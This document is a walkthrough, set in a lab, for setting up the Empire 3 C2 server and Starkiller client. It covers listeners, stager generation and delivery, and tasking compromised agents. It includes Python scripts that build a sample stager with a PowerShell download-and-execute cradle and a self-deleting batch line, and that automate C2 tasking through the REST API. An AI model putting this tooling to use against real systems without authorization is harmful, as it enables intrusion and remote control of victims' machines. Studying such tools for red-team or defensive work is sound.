Empire 3 is a post-exploitation framework that includes a pure-PowerShell Windows agent and Python 3.x Linux/OS X agents. It is the merger of the earlier PowerShell Empire and Python EmPyre projects. The framework offers cryptographically secure communications and a flexible architecture.
Documentation
GitHub: https://github.com/BC-SECURITY/Empire
Client: https://github.com/BC-SECURITY/Starkiller
Installation
Server
1. Clone the GitHub repository onto the server and run the installation script
- git clone https://github.com/BC-SECURITY/Empire.git
- cd Empire
- sudo ./setup/install.sh
(OPTIONAL) If the Python requirements were not already installed, install them from the requirements file under Empire/setup
- sudo pip3 install -r requirements.txt
2. The installation script prompts for a password; this walkthrough uses Pass123 (on anything other than a lab box, use a strong, unique password)
- Pass123
3. After that the server installation is complete.
4. Now start the server from the Empire directory, enabling the REST API and setting the credentials the client will use. Note that the REST API is reachable over the network (TCP 1337 over HTTPS, as used below), so restrict which hosts can reach it
- sudo ./empire --rest --username vk9sec --password Pass12345
Client
On the client we need Starkiller to access Empire
1. Download the client app
- sudo wget https://github.com/BC-SECURITY/Starkiller/releases/download/v1.3.2/starkiller-1.3.2.AppImage
2. change file permissions, add execute
- sudo chmod +x starkiller-1.3.2.AppImage
- ls -l starkiller-1.3.2.AppImage
3. Run the application
- ./starkiller-1.3.2.AppImage --no-sandbox
(--no-sandbox disables the Chromium sandbox; it is only needed when the AppImage refuses to start without it, for example when run as root)
4. Now connect to the Empire C2 server using the server IP and the credentials set when it was started (./empire --rest --username vk9sec --password Pass12345). The server presents a self-signed certificate, so Starkiller will warn about it on first connection
- URL https://192.168.0.21:1337
- Username vk9sec
- Password Pass12345
How to use Starkiller
1. On the left you can see the menu
Each option contains its own data. The workflow is: first start a listener, then generate a stager for that listener, then have the stager executed on the target machine.
2. Create a Listener (Any active listeners will be displayed)
- Click on Listeners
- Create listener
3. You can choose one of several listener types; in this case I use http and fill in a few fields, leaving the rest at their defaults. Host is the URL embedded in every stager built for this listener, so it must be the server address the target can reach, and its scheme must match the listener type (this is an http listener that happens to use port 443, not TLS).
- Name: test_listener
- Host: http://192.168.0.21:443
- Port: 443
- Click on Submit (at the bottom)
4. I go back to the Listeners page; I can see now the listener created
5. Now that we have the Listener we need to generate a stager, so we go to Stagers
- Click on Stagers
- Generate Stager
6. We need to choose the stager type; this time I choose windows/launcher_bat
- Type: windows/launcher_bat
- Listener: test_listener
- Language: PowerShell
- (OPTIONAL) optional fields (I leave them at their defaults)
- Click on Submit
7. Go back to the Stagers main page and the new stager is listed
- Stagers
8. You can download it under "Actions" and then deliver it to the target by your preferred method.
- Click on the Download icon
9. Once it is executed on the target machine, the new connection is listed under "Agents"
- Agents
10. Select the session you want to work on
11. Within that session, you can execute system commands
- Shell Command: dir
12. You can also run modules
- Execute Module: powershell/trollsploit/message
13. You can modify the module's options (here, the text of the message)
14. Execute it; the victim then gets a pop-up message like this
- Submit
15. Under "Modules" you can find every module included in the framework, each with a description
16. Clicking the play icon under "Actions" executes that module
- Choose the session (agent) to run it on
17. Click on Submit
18. Under "Reporting" you can find the history of commands issued to the agents
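Before delivering the stager downloaded in step 8, it is worth confirming what it actually contains: a launcher_bat is a batch file that runs powershell with an -enc argument, and the callback address baked into it is the Host you typed into the listener in step 3. The script below, an added example written for this page and not code from the Empire or Starkiller projects, decodes that argument the way powershell -enc defines it (base64 over the UTF-16LE text of the script) and reports the URLs, the PowerShell flags and whether the .bat deletes itself. The sample stager it inspects is constructed here: it has the shape of a launcher_bat, but its encoded script is a one-liner of our own, not Empire's launcher.

```python
"""Inspect a launcher_bat stager before delivering it.

Added example for this page; not code from the Empire or Starkiller projects.
The decoder relies only on how powershell -enc works (base64 of the UTF-16LE
script text). The sample stager is constructed here in launcher_bat's shape;
its encoded script is our own one-liner, not Empire's launcher.
"""
import base64
import re

# "-enc <base64>" (or the long form -EncodedCommand) on the launch line
ENC_RE = re.compile(r"-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def decode_encoded_command(blob: str) -> str:
    """powershell -enc expects base64 over the UTF-16LE bytes of the script."""
    return base64.b64decode(blob).decode("utf-16-le")


def inspect_launcher(bat_text: str) -> dict:
    """Return the decoded script, the callback URLs it contains, the PowerShell
    flags on the launch line, and whether the .bat deletes itself afterwards."""
    line = next((l for l in bat_text.splitlines() if ENC_RE.search(l)), None)
    if line is None:
        raise ValueError("no -enc payload found in the batch file")
    tokens = line.split()
    ps = next(i for i, t in enumerate(tokens) if t.lower().startswith("powershell"))
    enc = next(i for i, t in enumerate(tokens) if t.lower().startswith("-enc"))
    script = decode_encoded_command(tokens[enc + 1])
    return {
        "script": script,
        "urls": URL_RE.findall(script),
        "powershell_flags": tokens[ps + 1:enc],
        "self_deletes": 'del "%~f0"' in bat_text,
    }


def build_sample_bat(listener_url: str) -> str:
    """Constructed sample in launcher_bat's shape (not Empire's real output)."""
    script = f"IEX (New-Object Net.WebClient).DownloadString('{listener_url}')"
    blob = base64.b64encode(script.encode("utf-16-le")).decode()
    return "\r\n".join([
        "@echo off",
        f"start /b powershell -noP -sta -w 1 -enc {blob}",
        'start /b "" cmd /c del "%~f0"&exit /b',
        "",
    ])


if __name__ == "__main__":
    # For a real stager: inspect_launcher(open("launcher.bat").read())
    info = inspect_launcher(build_sample_bat("http://192.168.0.21:443"))
    print("flags:", info["powershell_flags"])
    print("calls back to:", info["urls"])
    print("script:", info["script"])
```

If the reported URL is not the address the target can reach (a Host of 0.0.0.0, localhost or a wrong interface), fix the listener and regenerate the stager rather than editing the .bat by hand, because the same Host is used inside the agent's later traffic as well.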
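Everything Starkiller does in steps 2 to 11 is a call to the REST API you enabled with --rest, so the same workflow (log in, create the http listener, generate the windows/launcher_bat stager, list agents, task a shell command) can be scripted. The client below is an added example written for this page, not code from the Empire or Starkiller projects. Endpoint paths and the ?token= query parameter follow Empire 3's REST API as documented for that release; check them against your server version. The server URL, listener settings and credentials are the ones used in the walkthrough; the CannedEmpire responder and the agent name it returns are constructed stand-ins so the workflow can be run offline.

```python
"""Drive the listener -> stager -> agent -> shell workflow over Empire's REST API.

Added example for this page; not code from the Empire or Starkiller projects.
Endpoint paths follow Empire 3's documented REST API (assumption: verify
against your server version). The canned responder below is constructed.
"""
import json
import ssl
import urllib.request
from urllib.parse import urlencode


class EmpireClient:
    """Thin REST client. transport(method, url, body) -> dict is injectable so
    the workflow can be exercised offline; the default sends real HTTPS."""

    def __init__(self, base_url, transport=None):
        self.base_url = base_url.rstrip("/")
        self.token = None
        self.transport = transport or self._https_transport

    @staticmethod
    def _https_transport(method, url, body):
        # The REST API serves a self-signed certificate, so verification is
        # disabled here; pin the server certificate instead in real use.
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        data = json.dumps(body).encode() if body is not None else None
        req = urllib.request.Request(url, data=data, method=method,
                                     headers={"Content-Type": "application/json"})
        with urllib.request.urlopen(req, context=ctx, timeout=30) as resp:
            return json.loads(resp.read().decode())

    def _call(self, method, path, body=None):
        url = self.base_url + path
        if self.token:  # every call after login carries the session token
            url += "?" + urlencode({"token": self.token})
        return self.transport(method, url, body)

    def login(self, username, password):
        resp = self._call("POST", "/api/admin/login",
                          {"username": username, "password": password})
        self.token = resp["token"]
        return self.token

    def create_http_listener(self, name, host, port):
        # Host is embedded verbatim in every stager: use the address targets
        # can reach, with a scheme matching the listener type.
        return self._call("POST", "/api/listeners/http",
                          {"Name": name, "Host": host, "Port": str(port)})

    def generate_stager(self, stager, listener):
        resp = self._call("POST", "/api/stagers",
                          {"StagerName": stager, "Listener": listener})
        return resp[stager]["Output"]

    def agents(self):
        return self._call("GET", "/api/agents")["agents"]

    def shell(self, agent, command):
        return self._call("POST", f"/api/agents/{agent}/shell",
                          {"command": command})


class CannedEmpire:
    """Constructed stand-in for the server: records each request and answers
    in the shape Empire returns. Not a real server; agent name is made up."""

    def __init__(self):
        self.calls = []

    def __call__(self, method, url, body):
        self.calls.append((method, url, body))
        path = url.split("?")[0]
        if path.endswith("/api/admin/login"):
            return {"token": "deadbeef"}
        if path.endswith("/api/stagers"):
            return {body["StagerName"]: {"Output": "@echo off\r\n..."}}
        if path.endswith("/api/agents"):
            return {"agents": [{"name": "XK4T9SZ2", "hostname": "WIN10-TEST"}]}
        if path.endswith("/shell"):
            return {"success": True, "taskID": 1}
        return {"success": True}


def run_workflow(client, listener="test_listener",
                 host="http://192.168.0.21:443", port=443):
    """Steps 2 to 11 of the walkthrough as API calls."""
    client.login("vk9sec", "Pass12345")
    client.create_http_listener(listener, host, port)
    stager = client.generate_stager("windows/launcher_bat", listener)
    names = [a["name"] for a in client.agents()]
    tasks = {n: client.shell(n, "dir") for n in names}
    return {"stager": stager, "agents": names, "tasks": tasks}


if __name__ == "__main__":
    # Offline run; pass transport=None to talk to the real server instead.
    print(run_workflow(EmpireClient("https://192.168.0.21:1337", CannedEmpire())))
```

The token is a bearer credential equivalent to the --password you started the server with, so treat scripts that hold it the way you would treat the password itself, and keep the API unreachable from anything other than your operator hosts.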